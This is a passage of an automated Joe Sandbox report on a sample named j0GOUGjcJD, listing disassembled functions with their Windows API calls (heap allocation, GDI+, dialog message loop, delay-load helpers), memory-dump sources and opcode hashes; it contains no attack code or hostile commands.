                • Opcode Fuzzy Hash: 68ac7f8a6e716c8f27efc60a402007f8b428469291e3a9596e60b9d88f011b59
                • Instruction Fuzzy Hash: E2D0A72510430E2569082AB17B421FA23445851B793F00B4BE720851D1EE9D4005701E
                APIs
                • DloadLock.DELAYIMP ref: 004EDC73
                • DloadProtectSection.DELAYIMP ref: 004EDC8F
                  • Part of subcall function 004EDE67: DloadObtainSection.DELAYIMP ref: 004EDE77
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: fca6e70aab39e38f6690bfdd735102561fb27469de940a16d2372001e711addf
                • Instruction ID: 89fbe8a9030b2a754d20cfc88bb1435d19da58584ceb32eea83b52cf1ef37ab1
                • Opcode Fuzzy Hash: fca6e70aab39e38f6690bfdd735102561fb27469de940a16d2372001e711addf
                • Instruction Fuzzy Hash: 85D0C9709803C44AC211EB169D5A75E6270B72878BF642607A106876E4DBAC4889E60E
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 006bfac47e425e40f22b9008b559f517db0d0ed07d3c846a9d6c69e756c0fa3e
                • Instruction ID: 5c27f958fe9aa1e82aa8b30612f0caafd32806c739ec6d2d60a400a4ef3e3344
                • Opcode Fuzzy Hash: 006bfac47e425e40f22b9008b559f517db0d0ed07d3c846a9d6c69e756c0fa3e
                • Instruction Fuzzy Hash: 28C01232058600BECB010BB0ED09D2FBBA8ABA4212F05C908B6A5C0160C238C018EB11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: d6e724dcf0f822614cb32649fa8a7f6042be5fe9b20103c1239461128139b7c0
                • Instruction ID: 8992cf215986e5154c55cc652920d3d4af8d219d9ce790ef32d8d6e594db9711
                • Opcode Fuzzy Hash: d6e724dcf0f822614cb32649fa8a7f6042be5fe9b20103c1239461128139b7c0
                • Instruction Fuzzy Hash: A0C1C670A04244AFEF15CF68C4A4BAE7BA5EF06314F0840BBDC45DB3A6DB399944CB65
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 8be4857f2ac4d7760819688600f980bcde115dc6b6366a80871641c2e57a572e
                • Instruction ID: a8b57f272bf8cc6bf6f74b1cf773c29e65f50b6d0f6ec1330ade17307f52802f
                • Opcode Fuzzy Hash: 8be4857f2ac4d7760819688600f980bcde115dc6b6366a80871641c2e57a572e
                • Instruction Fuzzy Hash: 8871CE71100F449ADB21DF31CCA1AEBB7E9AF14306F44496FE5AA47342DA396A48CF16
                APIs
                • __EH_prolog.LIBCMT ref: 004D8384
                  • Part of subcall function 004D1380: __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D1380: new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004D19A6: __EH_prolog.LIBCMT ref: 004D19AB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: bae90cab72a33ecbbc20dd864a28b0d6009a868335331409a41d7df7f5416eb8
                • Instruction ID: 5bb2c2e5e919dc1be4fbd44d23725c9db3a36da2a9bedbe028b22c4430196daa
                • Opcode Fuzzy Hash: bae90cab72a33ecbbc20dd864a28b0d6009a868335331409a41d7df7f5416eb8
                • Instruction Fuzzy Hash: 1F41C6718406549ADF20DB61CC65BFA73A8AF50308F0440EFE54A93293EF785EC9DB58
                APIs
                • __EH_prolog.LIBCMT ref: 004D1E05
                  • Part of subcall function 004D3B3D: __EH_prolog.LIBCMT ref: 004D3B42
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: aee614c63f4be865503dae7812e4ace3d2301392323108b56d5db9b227481f7b
                • Instruction ID: 4b1580d252efc9a8d694f009df5f5ad5abeeedc12725d3006252787ec8b2f32c
                • Opcode Fuzzy Hash: aee614c63f4be865503dae7812e4ace3d2301392323108b56d5db9b227481f7b
                • Instruction Fuzzy Hash: C0214831944108AFCB11EF9AD9619EEBBF6BF58304B1000AFE845A3361CB365E10CB68
                APIs
                • __EH_prolog.LIBCMT ref: 004EA7C8
                  • Part of subcall function 004D1380: __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D1380: new.LIBCMT ref: 004D13FE
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: fabf6326748aad4bef2a8f88726a47fbb87f61ddce6337b73eb5947d4512f096
                • Instruction ID: a1a72ab8669643c4089af221aa371c1a30a92983f67008bcc94db8a3e157c2a9
                • Opcode Fuzzy Hash: fabf6326748aad4bef2a8f88726a47fbb87f61ddce6337b73eb5947d4512f096
                • Instruction Fuzzy Hash: D8216D71C04289AACF15EF96C9515EEBBB4BF19304F0004EFE809A3352D7396E16CB65
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 3047429684ad5300614c9192f8c1579caf9094025f041290a7186be304f2edfc
                • Instruction ID: 21acf5402e985aa6a847c54f3584bac3b0b546c3dbc5717fd3643b8888c2e46b
                • Opcode Fuzzy Hash: 3047429684ad5300614c9192f8c1579caf9094025f041290a7186be304f2edfc
                • Instruction Fuzzy Hash: CD118273A10529ABCF26AFA9CCA19DEB736AF48754F05411BFC04A7351DA388D1087A8
                APIs
                  • Part of subcall function 004F85A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F85EA
                • _free.LIBCMT ref: 004FBBF6
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction ID: 07cccc3a491dcbe70c7ef2a1132bd7b39699e0062ca16e52d15960c6ab2a99ca
                • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction Fuzzy Hash: 3901F97320430D6BE3218F66D88596AFBEDFB86370F25051EE69487680EB34B905C779
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction ID: 48de557c09410bc120451b4875f628e3284438c26eb6b128a68bd33e5025f4fd
                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction Fuzzy Hash: 9EF08C705007069FDB30DE66C961616B7E8EB21320F208A1FE496C2780EB78D8A4C746
                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004F8FD3,00000001,00000364,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F85EA
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 5164cd076fbc4f9148c578bfc34d6f5a10ce5a109fd5185b0aba0c99c60b8ba2
                • Instruction ID: debf7f9984a05ab1ec39d3bc4e36c0f6bcecd874825bbb00fe8352463a8e08f9
                • Opcode Fuzzy Hash: 5164cd076fbc4f9148c578bfc34d6f5a10ce5a109fd5185b0aba0c99c60b8ba2
                • Instruction Fuzzy Hash: 74F0243160012D7BEB201A628C01A3B378C9F517A0B14911FAB08EE281CE28DD018AED
                APIs
                • __EH_prolog.LIBCMT ref: 004D5BDC
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6e84f44e1e57da21026db02237c657a392f493892708a82f3e1edc1dec9dfd0e
                • Instruction ID: e4f12f88d6e77c26014c07487d0e1f3561136a87113d457c4289dd169dfa0c49
                • Opcode Fuzzy Hash: 6e84f44e1e57da21026db02237c657a392f493892708a82f3e1edc1dec9dfd0e
                • Instruction Fuzzy Hash: 37016234905684DAC725F7A5C0653DDF7A49F59708F80419FA85A53383CBB81B08C7AA
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: cdee789e830d070cad4a58709d12ab57dc629e63af48d43bc0d18b846693ce1e
                • Instruction ID: 16f072c4882d3759f77a76adfc2d72fc846ece4bf36cb707433123884e0571f3
                • Opcode Fuzzy Hash: cdee789e830d070cad4a58709d12ab57dc629e63af48d43bc0d18b846693ce1e
                • Instruction Fuzzy Hash: 2EE0A02154012D7BEB21266A5C01B7B3B8CDB513A4F15122BAF14AE291CE288C0185AE
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004DA4F5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 9c115dd706d71d4dfa1c7d88b87c907ee960e69f2f844194fe34e5ed410bc2d4
                • Instruction ID: 14717d8f78c238a3fe98c68637f73c8d0128cebbc8665f445646ac6d0e81a5ae
                • Opcode Fuzzy Hash: 9c115dd706d71d4dfa1c7d88b87c907ee960e69f2f844194fe34e5ed410bc2d4
                • Instruction Fuzzy Hash: B3F0B431009380AACA221B7848247CB7B90AF15335F04CA4FF1F902391C27C14A99727
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 004E06B1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 7f5418bf647a245fc27d4f2c9029434caf3f850494b8bec132aa8305906b941e
                • Instruction ID: 0961eea5e5e40a22c0e91f58b1af345e19a39523787efdd6a2d22e3a0aa9871f
                • Opcode Fuzzy Hash: 7f5418bf647a245fc27d4f2c9029434caf3f850494b8bec132aa8305906b941e
                • Instruction Fuzzy Hash: BAD0C22060009025E6213377A85A7FF1B0A0FC2716F09002BB40D533D6CB9E08CAA2AA
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 004E9D81
                  • Part of subcall function 004E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004E9B30
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: b1f651272a04bb3575754ad446e03f640bc7aff00e87a4b623d69de1ac27757e
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: 98D0A53061414C7ADF40BE738C02D7B775CD700301F00416F7C0885181ED75DD109165
                APIs
                • GetFileType.KERNELBASE(000000FF,004D9887), ref: 004D9995
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: ece881ced037fc6a832e7b1de755993d8b32a86787fb795a5c9eedd01a228e8e
                • Instruction ID: 7492ffb3e67ea1e57f7035a494714ed99cce93487edaf79471aab0df69941b82
                • Opcode Fuzzy Hash: ece881ced037fc6a832e7b1de755993d8b32a86787fb795a5c9eedd01a228e8e
                • Instruction Fuzzy Hash: 8BD0C9B1011140A58F218634492909A6655DB83366B28D6EAD025C43A1D736CC02F545
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 004ED43F
                  • Part of subcall function 004EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EAC85
                  • Part of subcall function 004EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004EAC96
                  • Part of subcall function 004EAC74: IsDialogMessageW.USER32(00010418,?), ref: 004EACAA
                  • Part of subcall function 004EAC74: TranslateMessage.USER32(?), ref: 004EACB8
                  • Part of subcall function 004EAC74: DispatchMessageW.USER32(?), ref: 004EACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 60c75451dbf8971dd0752f80993f3f62a5b8b181562f383b423736b35fca4c19
                • Instruction ID: 8f16974df612ef8995e499497496c01b6e3f4518559dc464cca6ab25d2cad0d3
                • Opcode Fuzzy Hash: 60c75451dbf8971dd0752f80993f3f62a5b8b181562f383b423736b35fca4c19
                • Instruction Fuzzy Hash: E5D09E31144300ABDA112B52CE06F1F7AA6AB98B09F004559B345741B1CAA6AD34EB16
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                 • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                 • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 49d273ccb7c59ced55ebdc59559dc51af4011561fe9082729bbfad3f5eecb2e6
                • Instruction ID: 595c79387bcc5e90f56f0488d18e1409eafb5769886f2cbe918332187612db90
                • Opcode Fuzzy Hash: 49d273ccb7c59ced55ebdc59559dc51af4011561fe9082729bbfad3f5eecb2e6
                • Instruction Fuzzy Hash: FFB012A2E6C4426C310CB1076E52E3A074CE7C0B12B30801FB00DD02C0D4445C0F543A
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004ED8A3
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Memory Dump Source
